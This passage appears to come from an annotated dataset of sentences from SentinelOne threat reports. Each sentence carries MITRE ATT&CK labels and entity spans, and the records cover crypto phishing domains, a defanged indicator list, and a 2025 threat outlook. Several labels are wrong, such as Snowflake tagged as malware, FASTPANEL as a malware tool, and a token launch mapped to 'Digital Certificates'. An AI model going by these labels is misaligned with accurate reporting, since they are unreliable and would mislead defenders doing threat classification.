was pitched as such: “ $TANA AI.", "sentence_text": "The domain buy-tanai[.]com currently displays default FASTPANEL landing pages, suggesting it — along with other similar domains — is being staged for future attacks.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "staging buy-tanai[.]com for future attacks", "entities": [ { "text": "FASTPANEL", "start": 54, "end": 63, "label": "MalwareTool" }, { "text": "buy-tanai[.]com", "start": 11, "end": 26, "label": "Infrastructure_Indicator" }, { "text": "is being staged for future attacks.", "start": 130, "end": 165, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s30-becd41", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 30, "context_before": "The domain buy-tanai[.]com currently displays default FASTPANEL landing pages, suggesting it — along with other similar domains — is being staged for future attacks.", "sentence_text": "Since FASTPANEL-managed sites can be rapidly updated, these domains serve as adaptable templates for phishing campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "using FASTPANEL-managed domains as adaptable phishing templates", "entities": [ { "text": "FASTPANEL-managed sites", "start": 6, "end": 29, "label": "MalwareTool" }, { "text": "these domains ", "start": 54, "end": 68, "label": "Infrastructure_Indicator" }, { "text": "serve as adaptable templates for phishing campaigns", "start": 68, "end": 119, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s31-d275e0", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 31, "context_before": "Since FASTPANEL-managed sites can be rapidly updated, these domains serve as adaptable templates for phishing campaigns.", "sentence_text": "Notably, TANA AI (TANA) was launched by Dawn in mid-January to promote AI-driven trading and liquidity provision in the cryptocurrency market.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.003", "name": "Digital Certificates" } ], "procedure": "launching TANA AI for cryptocurrency trading/financial campaigns", "entities": [ { "text": "Dawn", "start": 40, "end": 44, "label": "ThreatActor" }, { "text": "TANA AI (TANA)", "start": 9, "end": 23, "label": "MalwareTool" }, { "text": "was launched", "start": 24, "end": 36, "label": "Action" }, { "text": "to promote AI-driven trading and liquidity provision in the cryptocurrency market.", "start": 60, "end": 142, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s32-a4a69b", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 32, "context_before": "Notably, TANA AI (TANA) was launched by Dawn in mid-January to promote AI-driven trading and liquidity provision in the cryptocurrency market.", "sentence_text": "Despite losing most of its initial value within days, the currency remains actively traded across multiple decentralized exchanges.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.003", "name": "Digital Certificates" } ], "procedure": "trading the currency across decentralized exchanges", "entities": [ { "text": "multiple decentralized exchanges.", "start": 98, "end": 131, "label": "Infrastructure_Indicator" }, { "text": "remains actively traded", "start": 67, "end": 90, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s33-1423cd", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 33, "context_before": "Despite losing most of its initial value within days, the currency remains actively traded across multiple decentralized exchanges.", "sentence_text": "Given the crypto-related nature of these domains, it is likely that threat actors are using them as flexible phishing infrastructure.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "using domains as phishing infrastructure", "entities": [ { "text": "threat actors ", "start": 68, "end": 82, "label": "ThreatActor" }, { "text": "these domains", "start": 35, "end": 48, "label": "Infrastructure_Indicator" }, { "text": "are using them as flexible phishing infrastructure.", "start": 82, "end": 133, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s34-b7c725", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 34, "context_before": "Given the crypto-related nature of these domains, it is likely that threat actors are using them as flexible phishing infrastructure.", "sentence_text": "By keeping them as blank templates, they can quickly modify hosted content to align with ongoing campaigns as needed.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "modifying hosted content on domains/templates for campaigns", "entities": [ { "text": " they", "start": 35, "end": 40, "label": "ThreatActor" }, { "text": "them ", "start": 11, "end": 16, "label": "Infrastructure_Indicator" }, { "text": "can quickly modify hosted content to align with ongoing campaigns", "start": 41, "end": 106, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s35-b84d29", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 35, "context_before": "By keeping them as blank templates, they can quickly modify hosted content to align with ongoing campaigns as needed.", "sentence_text": "DataOptimix is branded as a generative AI solution, though there are few details about what the service does.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s36-afd396", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 36, "context_before": "DataOptimix is branded as a generative AI solution, though there are few details about what the service does.", "sentence_text": "Historical Connections\nIn mid-2024, a campaign used related infrastructure in similar phishing messages, including those which compromised the Linus Tech Tips Twitter account along with several other high profile users.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Compromise of social media accounts via phishing messages.", "entities": [ { "text": " a campaign", "start": 35, "end": 46, "label": "ThreatActor" }, { "text": "related infrastructure", "start": 52, "end": 74, "label": "Infrastructure_Indicator" }, { "text": "compromised the Linus Tech Tips Twitter account", "start": 127, "end": 174, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s37-de9179", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 37, "context_before": "Historical Connections\nIn mid-2024, a campaign used related infrastructure in similar phishing messages, including those which compromised the Linus Tech Tips Twitter account along with several other high profile users.", "sentence_text": "Conclusion\nThe cryptocurrency landscape offers financially-motivated threat actors multiple opportunities for profit and fraud.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s38-5c350f", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 38, "context_before": "Conclusion\nThe cryptocurrency landscape offers financially-motivated threat actors multiple opportunities for profit and fraud.", "sentence_text": "While marketing for coins and tokens has long been irreverent and meme-driven, recent developments have further blurred the line between legitimate projects and scams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s39-790999", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 39, "context_before": "While marketing for coins and tokens has long been irreverent and meme-driven, recent developments have further blurred the line between legitimate projects and scams.", "sentence_text": "The marketing style and brand voice of this purportedly legitimate token closely resemble tactics used in known scam campaigns, highlighting how easily crypto enthusiasts can be misled in an already murky ecosystem.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s40-c08291", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 40, "context_before": "The marketing style and brand voice of this purportedly legitimate token closely resemble tactics used in known scam campaigns, highlighting how easily crypto enthusiasts can be misled in an already murky ecosystem.", "sentence_text": "Be especially cautious of messages containing links to account alerts or security notices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Sending phishing messages", "entities": [ { "text": "containing links to account alerts or security notices.", "start": 35, "end": 90, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s41-9b6969", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 41, "context_before": "Be especially cautious of messages containing links to account alerts or security notices.", "sentence_text": "If you’ve encountered similar suspicious activity, we’d love to hear from you.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s42-f77f21", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 42, "context_before": "If you’ve encountered similar suspicious activity, we’d love to hear from you.", "sentence_text": "Contact SentinelLABS at [email protected]\nIndicators of Compromise Domains buy-tanai[.]com dataoptimix[.]com gamecodestudios[.]com infringe-x[.]com protection-x[.]com rewards-dawn[.]com securelogins-x[.]xyz shortwayscooter[.]com violationappeal-x[.]com violationcenter-x[.]com x-accountcenter[.]com x-changealerts[.]com x-logincheck[.]com x-loginhelp[.]com x-passwordrecovery[.]com x-recoveraccount[.]com x-suspiciouslogin[.]com SHA-1 e2221e5c58a1a976e59fe1062c6db36d4951b81e – PHP file containing URL associated with X credential phishing activity cryptocurrency phishing Scam twitter", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "Credential phishing via hosted URLs", "entities": [ { "text": "buy-tanai[.]com dataoptimix[.]com gamecodestudios[.]com infringe-x[.]com protection-x[.]com rewards-dawn[.]com securelogins-x[.]xyz shortwayscooter[.]com violationappeal-x[.]com violationcenter-x[.]com x-accountcenter[.]com x-changealerts[.]com x-logincheck[.]com x-loginhelp[.]com x-passwordrecovery[.]com x-recoveraccount[.]com x-suspiciouslogin[.]com SHA-1 e2221e5c58a1a976e59fe1062c6db36d4951b81e", "start": 75, "end": 475, "label": "Infrastructure_Indicator" }, { "text": "containing URL associated with X credential phishing activity", "start": 487, "end": 548, "label": "Action" } ] }, { "uid": "sentinel-66_SentinelOne_report-p1-s43-7f67ba", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 43, "context_before": "Contact SentinelLABS at [email protected]\nIndicators of Compromise Domains buy-tanai[.]com dataoptimix[.]com gamecodestudios[.]com infringe-x[.]com protection-x[.]com rewards-dawn[.]com securelogins-x[.]xyz shortwayscooter[.]com violationappeal-x[.]com violationcenter-x[.]com x-accountcenter[.]com x-changealerts[.]com x-logincheck[.]com x-loginhelp[.]com x-passwordrecovery[.]com x-recoveraccount[.]com x-suspiciouslogin[.]com SHA-1 e2221e5c58a1a976e59fe1062c6db36d4951b81e – PHP file containing URL associated with X credential phishing activity cryptocurrency phishing Scam twitter", "sentence_text": "Share Tom Hegel", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s44-8ae276", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 44, "context_before": "Share Tom Hegel", "sentence_text": "An accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s45-991022", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 45, "context_before": "An accomplished cybersecurity researcher and a leader in the threat intelligence space, with a background of tracking some of the most interesting and unique threat actors globally.", "sentence_text": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s46-ef5249", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 46, "context_before": "Tom's dedication lies in driving cutting-edge cyber threat intelligence and research, collaborating with top-tier analysts and organizations worldwide.", "sentence_text": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s47-408fe4", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 47, "context_before": "His work has led to the discovery of new mercenary groups, emerging geopolitical cyber campaigns, and critical insights into global conflicts.", "sentence_text": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s48-365e26", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 48, "context_before": "He specializes in the discovery and analysis of emerging cybercrime \"services\" and evolving communication channels leveraged by mid-level criminal organizations.", "sentence_text": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s49-f8e884", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 49, "context_before": "Jim joined SentinelOne following ~4 years at a security start-up, also focused on malware research and organized crime.", "sentence_text": "Previously, he spent over 17 years at McAfee/Intel running their Threat Intelligence and Advanced Threat Research teams.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s50-250022", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 50, "context_before": "Previously, he spent over 17 years at McAfee/Intel running their Threat Intelligence and Advanced Threat Research teams.", "sentence_text": "Alex Delamotte\nAlex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s51-208e98", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 51, "context_before": "Alex Delamotte\nAlex's passion for cybersecurity is humbly rooted in the early aughts, when she declared a vendetta against a computer worm.", "sentence_text": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s52-014912", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 52, "context_before": "Alex enjoys researching the intersection of cybercrime and state-sponsored activity.", "sentence_text": "She relentlessly questions why actors pivot to a new technique or attack surface.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-66_SentinelOne_report-p1-s53-1158cd", "source": "sentinel", "doc_id": "66_SentinelOne_report", "page_number": 1, "sentence_id": 53, "context_before": "She relentlessly questions why actors pivot to a new technique or attack surface.", "sentence_text": "In her spare time, she can be found DJing or servicing her music arcade games.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s1-be9ab6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Reading the tea leaves of the past can offer no insight into novel and unexpected events to come, but it can help us prepare for that which is already forming in the shadows.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s2-b40ab3", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 2, "context_before": "Reading the tea leaves of the past can offer no insight into novel and unexpected events to come, but it can help us prepare for that which is already forming in the shadows.", "sentence_text": "We then range across the thoughts of our experts on a wide variety of topics that are sure to be front of mind to all those charged with organizational and national cybersecurity in 2025.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s3-cddfde", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 3, "context_before": "We then range across the thoughts of our experts on a wide variety of topics that are sure to be front of mind to all those charged with organizational and national cybersecurity in 2025.", "sentence_text": "This portion of the Chinese hacking apparatus has effectively engineered towards our collective blind spots – primarily through the pervasive use of non-attribution (ORB) networks as unmanageable tunnels into our respective countries.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1090", "name": "Proxy" } ], "procedure": "exploiting blind spots through ORB networks", "entities": [ { "text": "This portion of the Chinese hacking apparatus", "start": 0, "end": 45, "label": "ThreatActor" }, { "text": "non-attribution (ORB) networks", "start": 149, "end": 179, "label": "Infrastructure_Indicator" }, { "text": "engineered towards our collective blind spots", "start": 62, "end": 107, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s4-1af676", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 4, "context_before": "This portion of the Chinese hacking apparatus has effectively engineered towards our collective blind spots – primarily through the pervasive use of non-attribution (ORB) networks as unmanageable tunnels into our respective countries.", "sentence_text": "Combined with a more ‘old school’ style of hands-on-keyboard hacking that is more mindful of living off the land, not leaving telltale custom tooling laying around, and perhaps not even needing to establish persistence (thanks to permanently vulnerable internet-facing appliances), these tunnels have effectively placed a subset of threat actors into a level of operational impunity over their victims organizations and their baffled governments.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "living off the land", "entities": [ { "text": " a subset of threat actors", "start": 319, "end": 345, "label": "ThreatActor" }, { "text": "hands-on-keyboard hacking", "start": 43, "end": 68, "label": "Action" }, { "text": "living off the land", "start": 93, "end": 112, "label": "Action" }, { "text": "not leaving telltale custom tooling", "start": 114, "end": 149, "label": "Action" }, { "text": "not even needing to establish persistence", "start": 177, "end": 218, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s5-103995", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 5, "context_before": "Combined with a more ‘old school’ style of hands-on-keyboard hacking that is more mindful of living off the land, not leaving telltale custom tooling laying around, and perhaps not even needing to establish persistence (thanks to permanently vulnerable internet-facing appliances), these tunnels have effectively placed a subset of threat actors into a level of operational impunity over their victims organizations and their baffled governments.", "sentence_text": "We need to enter the ‘truth-and-reconciliation’ phase of cybersecurity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s6-f026ec", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 6, "context_before": "We need to enter the ‘truth-and-reconciliation’ phase of cybersecurity.", "sentence_text": "In essence, we need to collectively address the core tenets laid out in the laudable introduction to the 2023 National Cyber Strategy .", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s7-f04693", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 7, "context_before": "In essence, we need to collectively address the core tenets laid out in the laudable introduction to the 2023 National Cyber Strategy .", "sentence_text": "We need to work towards a collective realignment of incentives to reward difficult decision-making and investments towards meaningful security improvements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s8-297937", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 8, "context_before": "We need to work towards a collective realignment of incentives to reward difficult decision-making and investments towards meaningful security improvements.", "sentence_text": "In the age of hyperconsolidated cybersecurity space under massive lumbering recalcitrant publicly-traded companies, corporate leadership making “the right choice” is generally harder.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s9-f43c6c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 9, "context_before": "In the age of hyperconsolidated cybersecurity space under massive lumbering recalcitrant publicly-traded companies, corporate leadership making “the right choice” is generally harder.", "sentence_text": "It requires strong and clear security-minded leadership, especially in the face of decisions that may inversely correlate collective security posture with immediate profits.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s10-3bf7cb", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 10, "context_before": "It requires strong and clear security-minded leadership, especially in the face of decisions that may inversely correlate collective security posture with immediate profits.", "sentence_text": "We need to drive home a general understanding that medium-term shareholder value is dependent on the conscious stewardship of an organization’s security posture.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s11-cc2e10", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 11, "context_before": "We need to drive home a general understanding that medium-term shareholder value is dependent on the conscious stewardship of an organization’s security posture.", "sentence_text": "The Entire Cyber Threat View Is Up For Realignment The cybersecurity and cyber intelligence communities will deeply struggle with politicization and related factors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s12-ca06ac", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 12, "context_before": "The Entire Cyber Threat View Is Up For Realignment The cybersecurity and cyber intelligence communities will deeply struggle with politicization and related factors.", "sentence_text": "The last few years demonstrated relatively universal alignment from the cybersecurity private sector community.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s13-52cf26", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 13, "context_before": "The last few years demonstrated relatively universal alignment from the cybersecurity private sector community.", "sentence_text": "The war in Ukraine and Russia’s significant focus on cyberwarfare (particularly data destruction tools) allowed for a fairly permissive political environment across the industry, with several major vendors openly listing their support for a specific group and position.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s14-eaa365", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 14, "context_before": "The war in Ukraine and Russia’s significant focus on cyberwarfare (particularly data destruction tools) allowed for a fairly permissive political environment across the industry, with several major vendors openly listing their support for a specific group and position.", "sentence_text": "The recent Israel conflict returned most cybersecurity vendors to a more neutral position.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s15-3e61d2", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 15, "context_before": "The recent Israel conflict returned most cybersecurity vendors to a more neutral position.", "sentence_text": "This shift will likely accelerate and expand due to elections in the US and related western countries where claims of “weaponized” cyber intelligence communities are already made, combined with multiple high-level tech companies’ top executives becoming major partisan players.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s16-b172aa", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 16, "context_before": "This shift will likely accelerate and expand due to elections in the US and related western countries where claims of “weaponized” cyber intelligence communities are already made, combined with multiple high-level tech companies’ top executives becoming major partisan players.", "sentence_text": "Steve Stone, SVP Threat Intelligence & Managed Hunting The Culture of Cybercrime Isn’t", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s17-292197", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 17, "context_before": "Steve Stone, SVP Threat Intelligence & Managed Hunting The Culture of Cybercrime Isn’t", "sentence_text": "What It Was The culture of cybercrime and extortion isn’t what it was.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s18-daec01", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 18, "context_before": "What It Was The culture of cybercrime and extortion isn’t what it was.", "sentence_text": "While traditional motives – think financially-driven crime and state-sponsored espionage – continue to exist, a new generation of actors within this culture are proving to be the driving force behind many of the most damaging attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s19-261bcb", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 19, "context_before": "While traditional motives – think financially-driven crime and state-sponsored espionage – continue to exist, a new generation of actors within this culture are proving to be the driving force behind many of the most damaging attacks.", "sentence_text": "Victims now have to worry about ongoing reputation damage in tangentially-novel ways.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s20-f20b98", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 20, "context_before": "Victims now have to worry about ongoing reputation damage in tangentially-novel ways.", "sentence_text": "One example is the quick rush of meme-coins associated with ransomware and extortion incidents.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Use of ransomware and extortion", "entities": [ { "text": "ransomware", "start": 60, "end": 70, "label": "MalwareTool" }, { "text": "extortion incidents", "start": 75, "end": 94, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s21-0999f4", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 21, "context_before": "One example is the quick rush of meme-coins associated with ransomware and extortion incidents.", "sentence_text": "Physical\nconsequences\namongst cybercrime victims will continue to rise as well.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s22-031ea7", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 22, "context_before": "Physical\nconsequences\namongst cybercrime victims will continue to rise as well.", "sentence_text": "2024 brought us some startling examples of this style of attack in the form of Snowflake and the involvement of ‘ The Com ’-associated threat actors.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Use of Snowflake malware by ‘The Com’-associated threat actors”", "entities": [ { "text": "The Com ’-associated threat actors", "start": 114, "end": 148, "label": "ThreatActor" }, { "text": "Snowflake", "start": 79, "end": 88, "label": "MalwareTool" }, { "text": "style of attack", "start": 48, "end": 63, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s23-d72e76", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 23, "context_before": "2024 brought us some startling examples of this style of attack in the form of Snowflake and the involvement of ‘ The Com ’-associated threat actors.", "sentence_text": "This culture of extortion and cybercrime is rich with technically-adept actors looking to sidestep the traditional responses and countermeasures built around social engineering and malware delivery.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Sidestep traditional responses and countermeasures built around social engineering and malware delivery", "entities": [ { "text": "technically-adept actors", "start": 54, "end": 78, "label": "ThreatActor" }, { "text": "sidestep the traditional responses and countermeasures", "start": 90, "end": 144, "label": "Action" } ] }, { "uid": "sentinel-67_SentinelOne_report-p1-s24-90270c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 24, "context_before": "This culture of extortion and cybercrime is rich with technically-adept actors looking to sidestep the traditional responses and countermeasures built around social engineering and malware delivery.", "sentence_text": "These actors are unpredictable and technically capable, able to weaponise cutting edge tools and techniques.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s25-849c68", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 25, "context_before": "These actors are unpredictable and technically capable, able to weaponise cutting edge tools and techniques.", "sentence_text": "Moving into 2025, this will continue to become more visible as the culture proliferates and this new threat actor profile continues to challenge the existing pillars on which cybersecurity and threat intelligence stand.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s26-c7df5c", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 26, "context_before": "Moving into 2025, this will continue to become more visible as the culture proliferates and this new threat actor profile continues to challenge the existing pillars on which cybersecurity and threat intelligence stand.", "sentence_text": "Sometimes It May Be True The meteoric rise of AI in the tech community brought virtually every cybersecurity company and political entity into AI fact-finding and potential outcomes.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s27-edbe1f", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 27, "context_before": "Sometimes It May Be True The meteoric rise of AI in the tech community brought virtually every cybersecurity company and political entity into AI fact-finding and potential outcomes.", "sentence_text": "Additionally, AI examination and testing is underway by several known threat groups and cybercriminals.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s28-2abcf6", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 28, "context_before": "Additionally, AI examination and testing is underway by several known threat groups and cybercriminals.", "sentence_text": "The stated occurrences are likely to include some actual cases where AI is a factor, but the majority will not.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "sentinel-67_SentinelOne_report-p1-s29-45ca16", "source": "sentinel", "doc_id": "67_SentinelOne_report", "page_number": 1, "sentence_id": 29, "context_before": "The stated occurrences are likely to include some actual cases where AI is a factor, but the majority will not.", "sentence_text": "This will create additional confusion and mistrust around AI, which will in turn exacerbate the existing confusion and different positions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": 